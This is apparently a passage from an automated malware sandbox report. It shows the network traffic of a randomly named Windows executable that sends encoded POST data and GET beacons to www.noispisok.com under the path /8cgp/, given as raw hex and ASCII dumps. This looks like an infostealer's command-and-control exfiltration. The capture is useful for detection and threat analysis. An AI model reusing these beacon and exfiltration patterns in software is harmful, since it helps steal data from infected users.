                                                                    Data Raw: 58 68 39 6c 58 3d 79 61 39 6e 61 37 48 75 72 71 4d 77 47 77 52 72 59 6b 7a 44 4b 4b 39 51 58 31 6e 72 55 52 6b 2b 45 6c 67 32 61 62 62 54 45 2f 36 6b 62 2b 6f 4b 76 49 77 6f 30 49 4e 79 6c 6b 70 4e 6d 49 51 6f 6a 6b 55 33 4b 7a 48 39 63 52 63 77 6b 75 37 76 74 7a 54 76 54 63 62 78 62 4b 70 59 6d 4c 38 70 31 4c 56 73 4a 5a 4a 49 42 35 51 58 63 44 70 6b 47 75 5a 56 78 78 69 65 72 48 49 77 47 4a 6c 69 69 56 41 64 6f 69 48 6b 44 57 66 30 69 63 54 74 2f 6f 54 42 69 53 42 6d 74 5a 32 54 44 7a 69 61 62 5a 51 68 35 64 37 38 47 50 79 6b 34 32 31 4d 36 44 4a 34 53 76 6a 48 4d 39 59 37 48 6b 4d 4b 66 41 3d 3d
                                                                    Data Ascii: Xh9lX=ya9na7HurqMwGwRrYkzDKK9QX1nrURk+Elg2abbTE/6kb+oKvIwo0INylkpNmIQojkU3KzH9cRcwku7vtzTvTcbxbKpYmL8p1LVsJZJIB5QXcDpkGuZVxxierHIwGJliiVAdoiHkDWf0icTt/oTBiSBmtZ2TDziabZQh5d78GPyk421M6DJ4SvjHM9Y7HkMKfA==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.11.205025584.32.84.32807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:08.738596916 CEST1002OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 79 61 39 6e 61 37 48 75 72 71 4d 77 48 51 42 72 61 46 7a 44 4d 71 39 52 5a 56 6e 72 66 78 6b 36 45 6c 73 32 61 61 66 44 45 4e 4f 6b 62 62 4d 4b 75 4a 77 6f 7a 49 4e 79 78 55 70 4d 34 34 51 6e 6a 6b 59 4a 4b 32 2f 39 63 52 49 77 6c 63 44 76 76 44 54 67 59 38 62 32 4e 61 70 46 69 4c 38 5a 31 4c 5a 4b 4a 62 31 49 43 49 73 58 47 42 42 6b 58 76 5a 61 6e 68 69 63 74 48 49 76 4a 70 6c 57 69 56 46 69 6f 6e 4b 54 44 45 44 30 69 38 7a 74 2b 6f 54 47 73 69 41 75 76 5a 33 78 43 78 43 52 53 71 30 4f 35 4f 6e 44 47 4e 75 2f 77 6e 6b 4c 31 46 68 6b 49 2f 54 6d 54 63 74 63 47 30 74 75 4d 33 64 66 35 32 49 51 52 5a 59 4f 2b 4a 77 68 6e 39 4c 42 42 62 4c 69 61 55 38 6c 62 6e 4b 4d 52 6e 71 35 6c 4a 74 63 62 68 5a 38 6f 6d 57 66 6e 55 5a 62 57 61 37 44 37 66 70 51 56 32 69 62 58 42 4d 47 45 36 76 58 6e 46 59 7a 66 39 59 4d 35 52 74 34 4f 65 62 6b 4f 6d 49 31 62 35 73 6f 49 55 5a 7a 58 54 4d 41 42 64 6e 30 56 47 35 52 4e 4b 62 4c 53 38 54 6a 6a 42 38 37 72 56 4f 50 35 4e 2b 30 55 78 58 52 41 46 33 62 6c 48 7a 73 32 61 4a 67 54 58 46 59 65 6a 6f 36 71 57 48 77 62 6c 68 55 41 36 36 77 6f 64 4a 42 70 33 45 73 38 54 46 6d 63 4a 75 77 45 50 70 54 39 4d 59 4e 4b 55 4a 41 42 6d 74 66 35 41 35 50 61 76 49 37 32 53 34 50 64 6e 79 6a 35 53 42 71 49 48 79 62 45 54 4f 6f 52 74 34 73 6d 75 46 43 45 57 52 42 4e 71 51 30 52 33 2f 39 7a 53 4a 72 36 4d 6a 52 4b 4c 50 54 2b 48 4e 76 7a 61 39 6f 36 61 54 4f 39 56 42 5a 67 74 38 59 59 74 34 58 5a 76 4c 52 34 42 41 69 66 6d 4d 4a 33 6d 46 48 59 4f 4a 70 6b 31 39 77 32 56 4e 45 4a 37 36 43 45 73 4c 59 6c 4c 72 73 53 46 76 65 79 39 4b 74 31 5a 68 77 74 57 4e 43 59 74 59 3d
                                                                    Data Ascii: Xh9lX=ya9na7HurqMwHQBraFzDMq9RZVnrfxk6Els2aafDENOkbbMKuJwozINyxUpM44QnjkYJK2/9cRIwlcDvvDTgY8b2NapFiL8Z1LZKJb1ICIsXGBBkXvZanhictHIvJplWiVFionKTDED0i8zt+oTGsiAuvZ3xCxCRSq0O5OnDGNu/wnkL1FhkI/TmTctcG0tuM3df52IQRZYO+Jwhn9LBBbLiaU8lbnKMRnq5lJtcbhZ8omWfnUZbWa7D7fpQV2ibXBMGE6vXnFYzf9YM5Rt4OebkOmI1b5soIUZzXTMABdn0VG5RNKbLS8TjjB87rVOP5N+0UxXRAF3blHzs2aJgTXFYejo6qWHwblhUA66wodJBp3Es8TFmcJuwEPpT9MYNKUJABmtf5A5PavI72S4Pdnyj5SBqIHybETOoRt4smuFCEWRBNqQ0R3/9zSJr6MjRKLPT+HNvza9o6aTO9VBZgt8YYt4XZvLR4BAifmMJ3mFHYOJpk19w2VNEJ76CEsLYlLrsSFvey9Kt1ZhwtWNCYtY=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.11.205025684.32.84.32807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:11.595972061 CEST3867OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 79 61 39 6e 61 37 48 75 72 71 4d 77 48 51 42 72 61 46 7a 44 4d 71 39 52 5a 56 6e 72 66 78 6b 36 45 6c 73 32 61 61 66 44 45 4e 57 6b 59 74 51 4b 76 71 49 6f 79 49 4e 79 79 55 70 4a 34 34 51 41 6a 6e 6f 56 4b 32 36 4b 63 53 77 77 6c 4c 48 76 76 78 4c 67 64 38 62 7a 43 36 70 48 6d 4c 38 33 31 4c 56 6b 4a 62 67 2f 42 35 59 58 63 44 5a 6b 42 4d 78 56 36 68 69 65 74 48 49 6a 62 5a 6c 65 69 56 4a 49 6f 6e 47 54 44 48 6e 30 34 71 33 74 38 35 54 47 6c 53 41 68 35 70 33 36 4d 52 44 76 53 71 67 38 35 4f 6e 39 47 4d 36 2f 77 6b 63 4c 30 43 31 6e 47 2f 54 6d 49 63 74 66 43 30 68 55 4d 33 42 39 35 33 73 51 52 61 6f 4f 2b 70 77 68 33 4a 2f 43 49 62 4c 6f 51 30 38 2b 4e 6e 4f 36 52 6e 2b 48 6c 4c 68 63 62 52 4e 38 36 68 43 66 67 31 5a 62 4a 4b 37 42 31 2f 70 44 62 57 69 58 58 42 63 73 45 35 6e 74 6e 44 59 7a 66 66 51 4d 79 54 4a 2f 48 65 62 6d 53 57 4a 76 4e 35 67 38 49 56 31 76 58 54 4d 51 42 66 4c 30 56 58 4a 52 4f 4c 61 64 66 4d 54 75 6f 68 38 55 79 6c 79 53 35 4e 6a 34 55 30 58 42 41 47 62 62 71 48 7a 73 67 74 39 2f 49 33 46 54 58 44 6f 6b 33 6d 48 6e 62 6c 74 49 41 2f 62 46 6f 70 42 42 76 44 67 73 74 7a 46 6c 59 70 75 73 4b 76 70 52 71 63 59 4e 4b 56 31 55 42 6d 78 66 35 31 4e 50 49 50 34 37 7a 44 34 50 61 58 7a 6f 35 53 42 33 49 48 2f 72 45 56 57 4b 52 73 49 47 6d 73 70 43 48 44 39 42 4d 75 45 37 56 48 2f 30 33 53 4a 47 31 73 65 52 4b 4c 53 65 2b 44 67 51 7a 70 4a 6f 35 61 6a 4f 35 56 42 59 72 74 38 66 4f 64 34 46 64 76 48 33 34 42 63 55 66 69 4e 52 33 68 78 48 61 59 6b 6a 78 6e 4a 50 79 55 49 4c 47 4b 36 63 4d 73 61 54 74 4c 48 76 43 56 44 38 79 34 69 6f 79 50 70 78 2f 30 56 48 4d 72 67 47 47 55 51 33 79 41 74 63 71 35 52 69 53 33 35 4d 52 7a 31 64 74 4a 59 68 76 33 39 66 6f 54 5a 4f 77 34 63 5a 75 74 2f 4a 69 6d 6a 69 6e 79 62 4a 79 7a 76 46 61 46 70 59 68 58 7a 33 57 53 67 43 50 7a 66 6a 39 79 4f 30 68 33 33 62 71 2f 6c 36 77 7a 44 6c 30 58 61 6d 49 4d 45 6d 70 79 6f 57 6a 44 66 52 44 56 63 34 68 55 49 41 32 6d 6b 78 66 56 4c 57 47 32 70 53 6f 73 76 65 4e 67 78 53 53 74 6a 73 35 65 6a 75 39 67 44 63 6a 32 78 73 51 6a 31 41 78 5a 78 63 32 56 4e 33 54 70 2b 35 41 37 38 6a 53 58 31 74 55 42 56 4a 77 67 2b 56 76 32 59 76 6b 44 59 30 62 4c 72 45 4e 79 37 35 46 54 6b 77 4a 79 39 36 71 5a 66 37 49 48 6a 49 5a 4e 63 6c 7a 46 74 73 45 4d 35 74 70 65 46 4c 41 4d 64 39 58 69 4f 6b 55 6c 48 61 77 44 67 76 49 35 58 51 35 32 41 39 6a 48 49 2b 72 59 73 67 30 6b 4f 77 72 70 30 5a 68 32 6d 59 62 50 65 4f 4e 6b 76 33 78 42 2f 2b 79 6c 78 50 33 57 2b 43 34 4d 76 33 4a 70 41 7a 68 36 76 6c 46 36 38 63 59 78 63 65 69 4f 43 70 49 52 4b 79 55 31 37 6d 44 52 64 42 70 6c 64 36 4e 51 73 42 61 4f 62 4d 39 56 5a 32 55 4f 4e 6c 70 32 56 65 33 51 74 50 69 5a 6d 4e 42 6e 31 68 6c 43 59 6e 4e 31 63 58 41 62 6d 44 5a 50 42 67 30 78 33 34 79 64 76 32 55 51 31 4c 4f 61 74 7a 6f 75 59 41 4c 43 52 39 41 6b 48 42 69 4e 59 4a 38 50 68 45 55 49 74 6f 71 67 47 6a 6e 54 34 63 53 43 4f 69 61 38 67 71 57 4d 57 6b 57 37 46 52 58 39 54 30 56 4a 63 76 52 69 73 48 70 6f 4c 57 5a 52 49 6b 59 48 58 31 44 62 35 45 2b 44 4b 6a 72 39 50 33 78 56 69 4c 36 54 58 6e 75 72 68 50 42 36 66 35 65 77 6c 5a 75 71 6e 56 2f 48 69 64 55 4b 2b 61 31 6c 50 58 39 43 55 78 74 66 4e 7a 37 4a 74 76 37 6e 55 38 4a 2b 54 2b 51 56 56 49 6c 6f 4d 30 6c 77 4e 2b 75 53 6a 46 43 64 4e 44 7a 34 48 4d 67 61 6a 6d 61 6d 45 50 62 55 44 33 34 38 6f 59 73 43 4c 70 79 76 6e 74 37 78 2f 46 61 6b 43 67 37 50 4b 6d 52 73 47 73 4c 71 39 78 6b 4a 68 37 4f 58 44 36 7a 39 44 70 54 67 70 2b 53 4e 51 4c 6f 70 4c 37 6b 64 33 59 39 66 73 72 2b 6f 4e 34 6f 2f 6a 48 30 6c 70 45 6c 41 37 6f 4c 56 73 43 45 61 52 44 6f 34 47 5a 49 70 64 4b 66 67 75 41 4d 65 4f 6a 76 73 4f 64 54 4c 47 48 4c 68 53 63 73 57 67 4d 4b 39 74 36 76 6c 46 64 51 5a 45 37 6e 33 38 6c 46 4e 59 42 4e 75 38 64 62 63 6b 37 76 65 6d 64 37 77 49 79 6f 69 66 6b 69 50 54 30 75 6b 56 2f 41 46 78 45 72 47 63 68 44 46 61 4c 58 59 50 51 57 47 6b 4b 6a 56 51 6c 2b 66 69 57 68 61 70 72 77 7a 75 6a 5a 48 4e 42 38 55 68 52 51 63 4f 59 51 72 2b 43 4b 55 56 4b 4d 73 53 38 32 69 30 68 51 33 6e 79 49 77 44 36 50 30 4f 5a 6f 4b 79 56 34 55 6b 6e 48
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:29:11.596023083 CEST6445OUTData Raw: 57 49 61 63 4e 35 6c 69 41 31 4f 6c 6a 63 6b 36 45 4e 61 6f 67 63 70 58 72 56 4d 74 68 2b 74 46 75 5a 66 48 37 51 51 67 44 45 6c 79 73 53 6e 74 6f 63 74 72 61 79 46 42 59 41 74 47 35 4c 61 36 38 50 55 6b 31 54 45 4a 2b 64 67 54 69 79 73 2f 48 35
                                                                    Data Ascii: WIacN5liA1Oljck6ENaogcpXrVMth+tFuZfH7QQgDElysSntoctrayFBYAtG5La68PUk1TEJ+dgTiys/H5+52rkX1QAE2GZBz4a4494EPmEaUKpntx6ZIUeYsP2g25cuXdmCt1GJVImL661Qg7ZF5fe/UbTkqFuqN07OpJwVN9/2UkLybueENacPqwbNRCkh7FNzQPIEDor42awfh5tMNsyHY84wdo+sLdir9IfrpA4DMojsvCf
                                                                    Apr 24, 2024 12:29:11.596069098 CEST2578OUTData Raw: 61 54 54 39 78 6e 63 67 74 56 62 39 52 2f 4c 72 4e 35 43 61 35 52 59 4b 4b 78 47 6e 70 65 51 6e 2b 36 32 6e 70 51 7a 4d 56 43 4c 76 5a 44 50 6e 4d 39 48 61 6c 37 7a 78 30 62 32 42 34 36 38 44 41 6a 49 58 37 68 52 4b 73 4a 69 4c 67 70 4c 6f 38 54
                                                                    Data Ascii: aTT9xncgtVb9R/LrN5Ca5RYKKxGnpeQn+62npQzMVCLvZDPnM9Hal7zx0b2B468DAjIX7hRKsJiLgpLo8TBpDq6OuimyuH2Yj5rYJS1Hb6qMTr6a7wcAhdrJJHTBGUm6GGTf2eKltknithQXbXpql6eU7OHxly6eZgTnaK0kbrVnEnIdB4m1djkcmnm38XibjaB4s8Haw9nkbRhobAhWZbKzJ56CTpLgS6wOrN3xvxXKWfy0CGP
                                                                    Apr 24, 2024 12:29:11.929392099 CEST1289OUTData Raw: 72 75 43 54 6a 43 38 38 33 54 71 58 63 6f 64 37 66 2f 4b 65 4a 72 7a 55 6c 33 61 46 34 74 52 30 56 30 72 69 77 4d 30 65 70 46 6d 34 31 6e 74 53 73 6b 31 37 52 32 76 36 44 67 31 31 4d 75 34 42 6f 6f 56 54 6e 56 56 65 59 75 4f 39 46 52 33 47 79 41
                                                                    Data Ascii: ruCTjC883TqXcod7f/KeJrzUl3aF4tR0V0riwM0epFm41ntSsk17R2v6Dg11Mu4BooVTnVVeYuO9FR3GyAxMviIXGd02dhkZr+O7YUb30v6J3dYVMl/pgzd9trZ2tqkw0i5j5xgEvWchfNClsBqg0Y55HSQJ07Oyan6oMg/5NZURtxSe8qbQp4jTqa3BlSq197lHeG2WdvWpIqKlOhUGtvnrRjc8ul0s2XHzBOH4CrUgm4EQ77h
                                                                    Apr 24, 2024 12:29:11.929439068 CEST1289OUTData Raw: 7a 54 30 2f 4c 63 4b 35 77 5a 75 58 35 73 4f 4e 6c 47 6b 31 44 66 53 6c 4f 52 47 4d 4d 6f 61 7a 6e 44 36 55 52 4c 6e 51 76 76 39 52 58 66 73 51 48 66 6d 65 49 70 4c 48 32 52 42 69 31 2b 44 43 4d 54 4e 47 67 4b 43 76 76 55 4e 55 6c 35 42 30 54 62
                                                                    Data Ascii: zT0/LcK5wZuX5sONlGk1DfSlORGMMoaznD6URLnQvv9RXfsQHfmeIpLH2RBi1+DCMTNGgKCvvUNUl5B0TbWFIoPIwpidGkhjuh8dactmZhuf4bPCtd3XtDyeTV8hHFJbIR349qFJI66FFZka0JxqTFZ8LfjPm/Kt5eCsxYXX2ZISjzxVsRdP0pGwACjXl7lhAfmhKxTryW3XIYPPuCfrSKe0RUqQS+qamWskb17Z6dsvSAFmeRJ
                                                                    Apr 24, 2024 12:29:11.929491043 CEST10312OUTData Raw: 53 51 4e 74 30 78 6b 71 43 39 73 32 65 47 68 57 47 4f 71 2b 68 6e 47 78 6d 55 71 54 4b 6e 31 6a 43 42 64 5a 68 34 48 67 6e 44 67 4b 6c 53 57 41 78 48 38 5a 63 61 37 79 6b 6b 4f 49 58 49 74 4a 6a 5a 36 73 5a 6a 66 70 42 47 64 76 43 57 42 66 35 79
                                                                    Data Ascii: SQNt0xkqC9s2eGhWGOq+hnGxmUqTKn1jCBdZh4HgnDgKlSWAxH8Zca7ykkOIXItJjZ6sZjfpBGdvCWBf5yxcLL+1azVMslMFdHgYZ2ltVWLPPrvowBwAlCxEECgHcJQ/9Fq6jpjj1qidSjiFe2V4AosierF1Dbvbeq8wn+wYOjvZh1OaTtvJ+s6M4Qr5EsbwWB86SMm4OBHNCMGEkUbSCQjK7aRzkBA+FH3cKMPlXRjDsgW2+U1
                                                                    Apr 24, 2024 12:29:11.929660082 CEST10312OUTData Raw: 31 62 73 79 49 4f 6e 62 49 41 7a 6a 66 72 6a 2f 38 6e 6f 39 6b 48 61 67 37 32 34 52 68 58 2f 59 56 74 76 47 57 75 6f 36 71 70 55 69 4f 6c 52 68 32 44 32 50 77 46 52 4a 47 44 74 46 42 76 54 4b 42 6f 50 33 33 2f 57 58 68 58 45 33 4e 7a 62 32 47 6f
                                                                    Data Ascii: 1bsyIOnbIAzjfrj/8no9kHag724RhX/YVtvGWuo6qpUiOlRh2D2PwFRJGDtFBvTKBoP33/WXhXE3Nzb2GocLwOlZYoVhHN5h2UY0AdK/L7EL+jy1PrfLDZsWaCfEvx/J8LYFp4KwvJhKWgoRVrnE2Czvb0sbGK1E0SPJ5ezf8C2JpCmkzgfOZ5u+TxDVhj191OzQsKGnJUYxbag5iSQrl6NdIRPM6q0oJPEVWqXT3mm/tvCT6kv


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.11.205025784.32.84.32807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:14.456446886 CEST390OUTGET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.noispisok.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:14.791452885 CEST1289INHTTP/1.1 200 OK
                                                                    Server: hcdn
                                                                    Date: Wed, 24 Apr 2024 10:29:14 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 10072
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 2263d4edde37265b9a8116c3fad9983b-asc-edge4
                                                                    Expires: Wed, 24 Apr 2024 10:29:13 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 